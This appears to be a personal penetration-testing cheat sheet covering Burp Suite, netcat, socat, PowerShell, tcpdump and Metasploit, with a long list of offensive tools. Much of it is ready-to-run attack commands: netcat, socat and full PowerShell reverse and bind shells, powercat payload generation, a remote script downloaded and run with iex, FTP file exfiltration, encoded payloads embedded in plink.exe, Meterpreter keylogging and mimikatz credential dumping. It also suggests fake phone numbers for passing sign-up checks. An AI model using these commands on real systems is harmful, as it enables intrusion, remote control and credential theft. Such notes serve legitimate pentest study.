- EasyG
- Burp Suite
- Netcat
- Socat
- PowerShell
- WireShark
- Tcpdump
- Bash scripting
- Metasploit Framework
- Others
Old GIF but still cool
EasyG is a script that I use to automate some information gathering tasks for my hacking process.
[firefox] open every entry in <file_input> with firefox
[gettoburp] for every entry in <file_input> send a GET request using as a proxy 127.0.0.1:8080. This is useful for adding entries from a file to Burp Suite.
[assetenum] During this process, many tools are implemented to discover subdomains. Then, there is the process of discovering ports and possibly discovering technologies, misconfigurations and vulnerabilities for these assets discovered.
[webscreenshot] take a screenshot for every entry in <file_input> and make a gallery
[crawl-burp] crawl for every entry in <file_input> and pass the results to Burp Suite
[crawl-local] Crawl for every entry in <file_input> and save the results in local. Optionally, scan for vulnerabilities
[find-vulns] Given a <file_input> containing URLs, scan for vunlerabilities (API Keys, Secrets, BLH, XSS, LFI)
[do-everything] Asset enumeration > Crawl Locally > Scan for vunlerabilities (API Keys, Secrets, BLH, XSS, LFI)
- Advanced Scope regular expressions
^(.*\.)?test\.com$ add a domain + subdomains ^fd\d+-sub\.test\.com$ to capture domains like "fd1-sub.test.com", "fd2-sub.test.com", and so on - To add a new header
1. Go to Proxy -> Options -> Match and Replace -> Add 2. Change Type to Request Header 3. As the default text says in Match 'leave blank to add a new header' 4. Put the new header in Replace - Analyze better the results from Intruder with Settings > "Grep - Extract"
- Manually select in the response the value that you want to track in a new column in the results
- To fix visual glitches
Cool extensions
- Upload Scanner
- BurpJSLinkFinder
- JS Miner
- 403 Bypasser
- Autorize
- Anonymous Cloud
- Software Version Reporter
- Software Vulnerability Scanner
- IP Rotate
- Active Scan++
- JWT Editor
- InQL
- Wsdler
- Swagger-EZ
- Hackvertor
- Turbo Intruder
- HTTP Request Smuggler
- BurpCustomizer
- Burp Bounty
Browser extensions
- Trufflehog Chrome Extension
- Wappalyzer
- DotGit
- Cookie-Editor
- Shodan for Chrome and for Firefox
- If you are using FireFox, you could use FoxyProxy
Misc Commands
nc -nv <IP> <port> Connect to a TCP port
nc -nlvp <port> Set up a listener
nc -nv <IP> <port> Connect to a listener
nc -nlvp <port> > incoming.exe Receive a file
nc -nv <IP> <port> < /usr/share/windows-resources/binaries/wget.exe Transfer a file
nc -nlvp <port> -e cmd.exe Set up a bind shell
nc -nv <IP> <port> -e /bin/bash Send a reverse shell
Port Scanning
nc -nvv -w 1 -z <IP> <PORT-RANGE> Use netcat to perform a TCP port scan
nc -nv -u -z -w 1 <IP> <PORT-RANGE> Use netcat to perform an UDP port scan
Misc Commands
socat - TCP4:<remote server's ip address>:80 Connect to a remote server on port 80
socat TCP4-LISTEN:<PORT> STDOUT Create a listener
socat -d -d TCP4-LISTEN:<PORT> STDOUT Create a listener, -d -d for more verbosity
socat TCP4-LISTEN:<PORT>,fork file:secret.txt Transfer a file
socat TCP4:<IP>:<PORT> file:received_secret.txt,create Receive a file
socat TCP4:<IP>:<PORT> EXEC:/bin/bash Send a reverse shell
socat OPENSSL-LISTEN:<PORT>,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash Create an encrypted bind shell
socat - OPENSSL:<IP>:<PORT>,verify=0 Connect to an encrypted bind shell
Reverse Shell
socat -d -d TCP4-LISTEN:<PORT> STDOUT User 1, create a listener
socat TCP4:<IP>:<PORT> EXEC:/bin/bash User 2, send reverse shell to User 1
Encrypted bind shell with OpenSSL
$ openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 365 -out bind_shell.crt
req: initiate a new certificate signing request
-newkey: generate a new private key
rsa:2048: use RSA encryption with a 2,048-bit key length.
-nodes: store the private key without passphrase protection
-keyout: save the key to a file
-x509: output a self-signed certificate instead of a certificate request
-days: set validity period in days
-out: save the certificate to a file
$ cat bind_shell.key bind_shell.crt > bind_shell.pem
$ sudo socat OPENSSL-LISTEN:<PORT>,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash Create an encrypted bind shell
$ socat - OPENSSL:<IP>:<PORT>,verify=0 Connect to the encrypted bind shell
Misc Commands
Set-ExecutionPolicy Unrestricted Set the PowerShell execution policy
Get-ExecutionPolicy Get value for ExecutionPolicy
(new-object System.Net.WebClient).DownloadFile('http://<IP>/<filename>','C:\<DIR>\<filename>') Download a file
iwr -uri http://<IP>/<filename> -Outfile <filename> Download a file
powershell -c "command" The -c option will execute the supplied command as if it were typed at the PowerShell promptEncode PowerShell from the command line
-
echo "iex(cmd)" | iconv -t UTF-16LE | base64 -w 0 | xclip -sel clip
Send a reverse shell with PowerShell
-
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<IP>',<PORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i =$stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
-
$client = New-Object System.Net.Sockets.TCPClient('<IP>',<PORT>); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush(); } $client.Close();
Set up a bind shell with PowerShell
powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeNameSystem.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"Powercat
Script: powercat.ps1.
powercat -c <IP> -p <PORT> -i C:\<DIR>\powercat.ps1 Send a file
powercat -c <IP> -p <PORT> -e cmd.exe Send a reverse shell
powercat -l -p 443 -e cmd.exe Set up a bind shell; -l option to create a listener, -p to specify the listening port number, -e to have an application executed once connected
powercat -c <IP> -p <PORT> -e cmd.exe -g > reverseshell.ps1 Create a stand-alone payload
powercat -c <IP> -p <PORT> -e cmd.exe -ge > encodedreverseshell.ps1 Create an encoded stand-alone payload with powercatLoad a remote PowerShell script using iex
iex (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')Execute an encoded stand-alone payload using PowerShell
powershell.exe -E ZgB1AG4AYwB0AGkAbwBuACAAUwB0AHIAZQBhAG0AMQBfAFMAZQB0AHUAcAAKAHsACgAKACAAIAAgACAAcABhAHI...Upload a file to an FTP server
$ftpRequest = [System.Net.FtpWebRequest]::Create("ftp://<IP>:<PORT>/<FILE_TO_UPLOAD>"); $ftpRequest.Credentials = New-Object System.Net.NetworkCredential("<USERNAME>", "<PASSWORD>"); $ftpRequest.Method = [System.Net.WebRequestMethods+Ftp]::UploadFile; $fileContents = [System.IO.File]::ReadAllBytes((Resolve-Path "<FILE_TO_UPLOAD>")); $ftpRequest.ContentLength = $fileContents.Length; $requestStream = $ftpRequest.GetRequestStream(); $requestStream.Write($fileContents, 0, $fileContents.Length); $requestStream.Close(); $response = $ftpRequest.GetResponse(); $response.Close()- Change
<IP>,<PORT>,<FILE_TO_UPLOAD>,<USERNAME>,<PASSWORD>
Filters
net 10.10.1.0/24, capture traffic only on the10.10.1.0/24address range
Display filters
tcp.port == 21, only display FTP data
Misc operations
-
Follow TCP stream:
Right-click>Follow>TCP Stream
tcpdump -r packets.pcap Read packet capture
tcpdump -n -r packets.pcap | awk -F" " '{print $3}' | sort | uniq -c | head Read and filter the packet capture;
-n option to skip DNS name lookups, -r to read from our packet capture file
awk to print the destination IP address and port, sort and uniq -c to sort and count the number of times the field appears in the capture, respectively, head to only display the first 10 lines of the output
tcpdump -n src host <IP> -r packets.pcap Tcpdump filters; src host to output only source traffic
tcpdump -n dst host <IP> -r packets.pcap Tcpdump filters; dst host to output only destination traffic
tcpdump -n port <PORT> -r packets.pcap Tcpdump filters; filter by port number
tcpdump -nX -r packets.pcap -X to print packet data in both HEX and ASCII format
Advanced Header Filtering: display only the data packets
- Look for packets that have the
PSHandACKflags turned on- The
ACKflag will be set for all packets sent and received after the initial 3-way handshake - In interactive Application Layer protocols, the
PSHflag is frequently used to guarantee rapid delivery of a packet and prevent buffering.
- The
- TCP flags are defined starting from the 14th byte
ACKandPSHare represented by the fourth and fifth bits of the 14th byte- Turning on these bits would result in
00011000=24in decimal, verify it withecho "$((2#00011000))"
- To display packets that have the ACK or PSH flags set:
sudo tcpdump -A -n 'tcp[13] = 24' -r packets.pcap
- Grep all the subdomains for
target.comfromindex.html:grep -o '[^/]*\.target\.com' index.html | sort -u > list.txt - Get the IPs from list.txt:
for url in $(cat list.txt); do host $url; done | grep "has address" | cut -d " " -f 4 | sort -u
sudo systemctl start postgresql start postgresql manually
sudo systemctl enable postgresql start postgresql at boot
sudo msfdb init create the Metasploit database
sudo apt update; sudo apt install metasploit-framework update the Metasploit Framework
sudo msfconsole -q start the Metasploit Framework
show -h help flag
show auxiliary list all auxiliary modules
search type:auxiliary name:smb search for SMB auxiliary modules
back move out of the current context and return to the main msf5 prompt
previous switch us back to the previously selected module
services display the metasploit database logs; -p: filter by port number; -s: service name; -h: help command
hosts show discovered hosts
db_nmap <IP> -A -Pn performing a Nmap scan from within Metasploit
workspace list workspaces; -a: add a workspace, -d: delete a workspace
sessions -l list all sessions; -i: to interact with a session
transport list list the currently available transports for the meterpreter connection
To interact with a module
inforequest more info about the moduleshow optionsmost modules require options- Use
setandunsetto configure the options - Use
setgandunsetgto configure global options show payloadslist all payloads that are compatible with the current exploit modulecheckcheck if the target is vulnerablerunorexploitto run the exploit-juse as background jobjobslist background jobskillkill job
windows/shell_reverse_tcp- Connect back to attacker and spawn a command shellwindows/shell/reverse_tcp- Connect back to attacker, Spawn cmd shell (staged)- Useful, for example, if the vulnerability you need to exploit doesn't have enough buffer space to hold a full payload
upload /usr/share/windows-resources/binaries/nc.exe c:\\Users\\tidusdownload c:\\Windows\\system32\\calc.exe /tmp/calc.exeshellget the shell
generate -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-resources/binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exeembedding the payload in plink.exe from within msfconsole- Use the framework
multi/handlerto catch standard reverse shells- Works for all single and multi-stage payloads
- Specify the incoming payload type
screenshot take a screenshot of the compromised host desktop
keyscan_start start the keystroke sniffer
keyscan_dump dump captured keystrokes
keyscan_stop stop the keystroke sniffer
Migrate your meterpreter process
psview all running processes and then pick onemigrate <PID>migrate the process to a target PID
Use mimikatz from meterpreter
load kiwirun the extension kiwigetsystemacquire SYSTEM privilegescreds_msvdump the system credentials
Port forwarding
meterpreter> portfwd -h- Example
portfwd add -l 3389 -p 3389 -r 192.168.1.121
- Example
For a temporary server
python -m SimpleHTTPServer 7331python3 -m http.server 7331php -S 0.0.0.0:8000ruby -run -e httpd . -p 9000busybox httpd -f -p 10000
For a temporary public server
For a temporary FTP server
- Host:
python -m pyftpdlib -w - Client:
ftp open <IP> 2121 anonymous
For auths
- textverified.com for auths requiring a phone number
- quackr for a fake phone number (free)
- temp-mail.org
To find parameters
- Arjun detection of the parameters present in the application
- ParamSpider
Asset enumeration/discovery
- amass
amass enum -brute -active -d target -o output/target.txt -v
- subfinder
subfinder -d target -all -o output/target_subfinder.txt"
- github-subdomains
- bgp.he.net to find ASN +
amass intel -asn <ASN> - crt.sh
- Crtsh-Fetcher
- To find new domains
cat json.txt | jq -r '.[].common_name' | sed 's/\*//g' | sort -u | rev | cut -d "." -f 1,2 | rev | sort -u | tee out.txt
- gobuster + all.txt by jhaddix
- dnsx
- Reverse DNS lookup
cat ip.txt | dnsx -ptr -resp-only
- Reverse DNS lookup
- VhostScan to discover virtual hosts
- gip a command-line tool and Rust library to check global IP address.
- anew to add only new subdomains
- httpx
type scope.txt | httpx -sc -mc 404find404pages
- urless
- hakcheckurl
python3 urless.py -i urls.txt | hakcheckurl | grep -v 404
Exploits
- SearchSploit
searchsploit afd windows -w -t;-wto return the URL for https://www.exploitdb.com,-tto search the exploit title
- Packet Storm
- BugTraq
- National Vulnerability Database
- Browser Exploitation Framework (BeEF)
- PoC in GitHub
For Reporting
- Vulnerability Rating Taxonomy
- CVSS Calculator
- PwnDoc
- Vulnrepo
- PlexTrac
- Offensive Security Exam Report Template in Markdown
Misc tools
- URL Decoder/Encoder
- base64encode.org
- Down or not
- DigitalOcean See Setting Up Your Ubuntu Box for Pentest and Bug Bounty Automation
- Exploit Database
- USB Rubber Ducky
- Flipper Zero
- Create a random text file
- BruteSpray
python brutespray.py --file nmap.xml --threads 5 --hosts 5 - BadSecrets a library and command line tool for finding secrets
- Proxyman to view requests from the app on your computer
- filesec.io
- malapi.io
- lots-project.com
- lolbas-project.github.io
- gtfobins.github.io
- loldrivers.io
- WAF Bypass Tool
- Forensia
- peepdf - PDF Analysis Tool
- hakoriginfinder for discovering the origin host behind a reverse proxy
- ISTanCo IST - Domain Registration to buy a short domain
- pentesting-osTicket
- wafw00f to identify WAFs